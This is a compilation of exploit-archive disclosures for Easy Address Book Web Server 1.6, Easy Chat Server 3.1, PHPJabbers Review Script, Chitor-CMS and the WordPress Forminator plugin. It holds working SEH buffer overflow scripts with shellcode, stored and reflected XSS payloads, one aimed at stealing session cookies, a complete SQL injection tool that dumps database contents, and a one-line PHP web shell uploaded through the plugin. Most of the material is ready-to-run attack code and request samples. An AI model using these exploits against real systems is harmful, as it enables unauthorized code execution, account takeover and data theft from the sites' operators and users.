Easy Address Book Web Server version 1.6 suffers from buffer overflow and cross site scripting vulnerabilities.

# Exploit Title: Easy Address Book Web Server v1.6 - MultipleVulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-10# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html# Software Link : http://www.efssoft.com/eabws.exe (md5sum:69f77623bb32589fb5343f598b61bbd9)# Tested Version: 1.6# Tested on:  Windows 7, 10# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.By sending an overly long username string to /searchbook.ghp for asking thename via POST, an attacker may be able to execute arbitrary code.Proof of concept:import socketimport structdef sendbuff():    # > arwin.exe kernel32.dll WinExec    # WinExec is located at 0x776f2c91 in kernel32.dll    shellcode_WinExec = ("\x33\xc0"                          # XOR EAX,EAX"\x50"                              # PUSH EAX      => padding for lpCmdLine"\x68\x2E\x65\x78\x65"              # PUSH ".exe""\x68\x63\x61\x6C\x63"              # PUSH "calc""\x8B\xC4"                          # MOV EAX,ESP"\x6A\x01"                          # PUSH 1"\x50"                              # PUSH EAX"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec"\xFF\xD3")                         # CALL EBX    shellcode_system = (        "\x31\xC9"                # xor ecx,ecx        "\x51"                    # push ecx        "\x68\x63\x61\x6C\x63"    # push 0x636c6163        "\x54"                    # push dword ptr esp        "\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system        "\xFF\xD0")               # call eax    shellcode = shellcode_WinExec    # SEH    junk1 = "A"*455    buffer =  junk1    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode    buffer +=  struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071eSSLEAY32.DLL from !Mona 0x1001071e    buffer += "\x90" * 20    buffer += shellcode    junk2 =  "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)    buffer += junk2    return bufferdef REQ_POST (padding):    POST = (    "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0\r\n"    "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"    "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"    "Content-Type: application/x-www-form-urlencoded\r\n"    "Content-Length: " + str(108 + len(padding))+ "\r\n"    "Connection: keep-alive\r\n"    "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"    "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"    "Upgrade-Insecure-Requests: 1\r\n"    "Host: "+str(ip)+"\r\n\r\n"    "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding+"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"    )    return POSTip = '192.168.X.X'port = 80payload = sendbuff()try:    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address BookWeb Server V1.6, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_POST(payload))    s.recv(1024)    s.close()    print "\n[*] Sended POST length " + str(len(payload))except:    print "Connecting error"# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POSTmethod), in multiple parameters.Proof of concept:POST http://localhost/addrbook.ghp?id=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 475Origin: http://localhostConnection: keep-aliveReferer: http://localhost/editcontact.ghp?id=1&cid=12Cookie: SESSIONID=15337; UserID=; PassWD=Upgrade-Insecure-Requests: 1Host: localhostaddrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=SaveVulnerable parameters: firstname, homephone, lastname, middlename,workaddress, workcity, workcountry, workphone, workstate, workzipResponse: <TR>              <TD class=row2><SPAN class=genmed><A target=_blankclass=genmed href="viewcontact.ghp?id=1&cid=12">demo1</a><script>alert(1);</script><a> demo1</A></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,USA</SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POSTmethod, authenticated Admin user), in multiple parameters.Proof of concept:Example 1:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 134Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=UpdateVulnerable parameter: emailResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value="test"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>Example 2:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 144Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=UpdateVulnerable parameter: usernameResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35" value="tt@fsdfs.com"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-09# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497# Vendor Homepage: http://www.echatserver.com/# Software Link : http://echatserver.com/ecssetup.exe (md5sum:c682138ebbea9af7948a3f142bbd054b)# Tested Version: 3.1# Tested on:  Windows 7, 10# CVE-2023-4494: Vulnerability Type: register Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.By sending an overly long username string to register.ghp for asking theusername via GET, an attacker may be able to execute arbitrary code.Proof of concept:import socketdef sendbuff():    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)    shellcode = (    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +    "\x1c\x39\xbd"    )    # SEH    junk1 = "A"*473    buffer =  junk1    buffer += "\xeb\x06\x90\x90"           # short jmp to shellcode    buffer += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1ESSLEAY32.DLL from !Mona    buffer += shellcode    junk2 =  "D"*(600 - 473 - len(shellcode) - 4 - 4)    buffer += junk2    return bufferdef REQ_GET (padding):    GET = (    "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"    "Host: "+str(ip)+":80\r\n"    "Accept-Language: es-es\r\n"    "Accept-Encoding: gzip, deflate\r\n"    "Referer: http://"+str(ip)+"\r\n"    "Connection: Keep-Alive\r\n\r\n"    )    return GETip = '192.168.X.X' # change the ip addressport = 80payload = sendbuff()try:    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server3.1, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_GET(payload))    s.recv(1024)    s.close()    print "\n[*] Sended GET length " + str(len(payload))except:    print "Connection error"# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Resumeparameter. The XSS is loaded from /register.ghp.Proof of concept:POST http://localhost/registresult.htm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 257Origin: http://localhostConnection: keep-aliveReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1Host: localhostUserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>Go to:http://localhost/register.ghp?username=<redacted>&password=<redacted>Response - xss:<TR><TD>Your profile/interests:<BR><TEXTAREA rows="4" cols="30"name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><INPUT type="hidden" name="cw" value="0"><INPUT type="hidden" name="RoomID" value=""><INPUT type="hidden" name="RepUserName" value=""></TD></TR># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.Proof of concept:POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 248Origin: http://localhostConnection: keep-aliveReferer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4Upgrade-Insecure-Requests: 1Host: localhoststaticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=Response:<html><head></head><body><script language="JavaScript"></script></body></html># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Iconparameter. The XSS is loaded from /users.ghp.Proof of concept:POST /registresult.htm HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 235Origin: http://localhostConnection: closeReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse:<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>When user information page load:http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4&nbsp;<font color="red">[vip room]</font><br><br>[Online users:1]<br><br>[<ahref="javascript:parent.chatsubmit.getname('All');"target="chatsubmit">All</a>]<br><br><script>if(navigator.appName!="Netscape" && parent.chatsubmit.document &&parent.chatsubmit.document.readyState == "complete")parent.chatsubmit.listcolorchange();</script><img src="/images/""><script>alert(111)</script><i>[<ahref="javascript:parent.chatsubmit.getname('<redacted>');"target="chatsubmit"><redacted></a>]<==<br><br><br><br>[<a href="javascript:OnRegister();">Change infomation</a>]</i>

Easy Address Book Web Server 1.6 Buffer Overflow / Cross Site Scripting

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

**Chitor-CMS v1.1.2 - Pre-Auth SQL Injection**

**Platform:****PHP**

**Date:****2023-04-20**

  

    #!/usr/bin/python3
    
    #######################################################
    #                                                     # 
    #  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          #
    #  Date: 2023/04/13               #
    #  ExploitAuthor: msd0pe                                  #
    #  Project: https://github.com/waqaskanju/Chitor-CMS  #
    #  My Github: https://github.com/msd0pe-1             #
    #  Patched the 2023/04/16: 69d3442 commit             #
    #                                                     #
    #######################################################
    
    __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
    __author__ = 'msd0pe'
    __version__ = '1.1'
    __date__ = '2023/04/13'
    
    class bcolors:
        PURPLE = '\033[95m'
        BLUE = '\033[94m'
        GREEN = '\033[92m'
        OCRA = '\033[93m'
        RED = '\033[91m'
        CYAN = '\033[96m'
        ENDC = '\033[0m'
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'
    
    class infos:
        INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
        ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
        GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
        PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
    
    import re
    import requests
    import optparse
    from prettytable import PrettyTable
    
    def DumpTable(url, database, table):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        columns = []
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    columns.append(i)
                    pass
        except:
            pass
        x.field_names = columns
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    x.add_rows([i])
        except ValueError:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    i.append("")
                    x.add_rows([i])        
        print(x)
    
    def ListTables(url, database):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["TABLES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def ListDatabases(url):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["DATABASES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def Main():
        Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
        Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
        Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
        Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
        Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
        Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
        Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
        (options, args) = Menu.parse_args()
    
        Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
        """)
        Menu.add_option_group(Examples)
    
        if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
            Menu.print_help()
            print('')
            print('  %s' % __description__)
            print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
            print('  Any malicious or illegal activity may be punishable by law')
            print('  Use at your own risk')
    
        elif len(args) == 0:
            try:
                if options.url != None:
                    if options.l_databases != None:
                        ListDatabases(options.url)
                    if options.database != None:
                        if options.l_tables != None:
                            ListTables(options.url, options.database)
                        if options.table != None:
                            if options.dump != None:
                                DumpTable(options.url, options.database, options.table)
            except:
                print("Unexpected error")
    
    if __name__ == '__main__':
        try:
            Main()
    
        except KeyboardInterrupt:
            print()
            print(infos.PROCESS + "Exiting...")
            print()
            exit(1)

CVE-2023-31714: OffSec’s Exploit Database Archive

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

    # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
    # Date: 2023-07-20
    # Exploit Author: Mehmet Kelepçe
    # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
    # Software Link: https://wordpress.org/plugins/forminator/
    # Version: 1.24.6
    # Tested on: PHP - Mysql - Apache2 - Windows 11
    
    HTTP Request and vulnerable parameter:
    -------------------------------------------------------------------------
    POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Length: 1756
    sec-ch-ua:
    Accept: */*
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
    Safari/537.36
    sec-ch-ua-platform: ""
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: wp-settings-time-1=1689794282;
    wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
    Connection: close
    
    .
    .
    .
    .
    .
    
    ------WebKitFormBoundaryTmsFfkbegmAjomne
    Content-Disposition: form-data; name="postdata-1-post-image";
    filename="mehmet.php"
    Content-Type: application/octet-stream
    
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    
    
    
    Source Code:
    wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
    --------------------------------------------------------------------
            public function has_upload() {
    $fields = $this->get_fields();
    
    if ( ! empty( $fields ) ) {
    foreach ( $fields as $field ) {
    if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
    return true;
    }
    }
    }
    
    return false;
    }
    Vulnerable parameter: postdata-1-post-image
    
    and
    
    
    Source code:
    wp-content/plugins/forminator/library/fields/postdata.php:
    -------------------------------------------------------------------
    if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
    if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
    $_FILES[ $image_field_name ]['name'] ) ) {
    $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
    $valid     = wp_check_filetype( $file_name );
    
    if ( false === $valid['ext'] || ! in_array( $valid['ext'],
    $this->image_extensions ) ) {
    $this->validation_message[ $image_field_name ] = apply_filters(
    'forminator_postdata_field_post_image_nr_validation_message',
    esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
    $id
    );
    }
    }
    }
    
    Vulnerable function: $image_field_name
    -------------------------------------------------------------------------
    
    Payload file: mehmet.php
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    -------------------------------------------------------------------------

CVE-2023-4596: OffSec’s Exploit Database Archive

Grawlix version 1.5.1 suffers from a cross site scripting vulnerability.

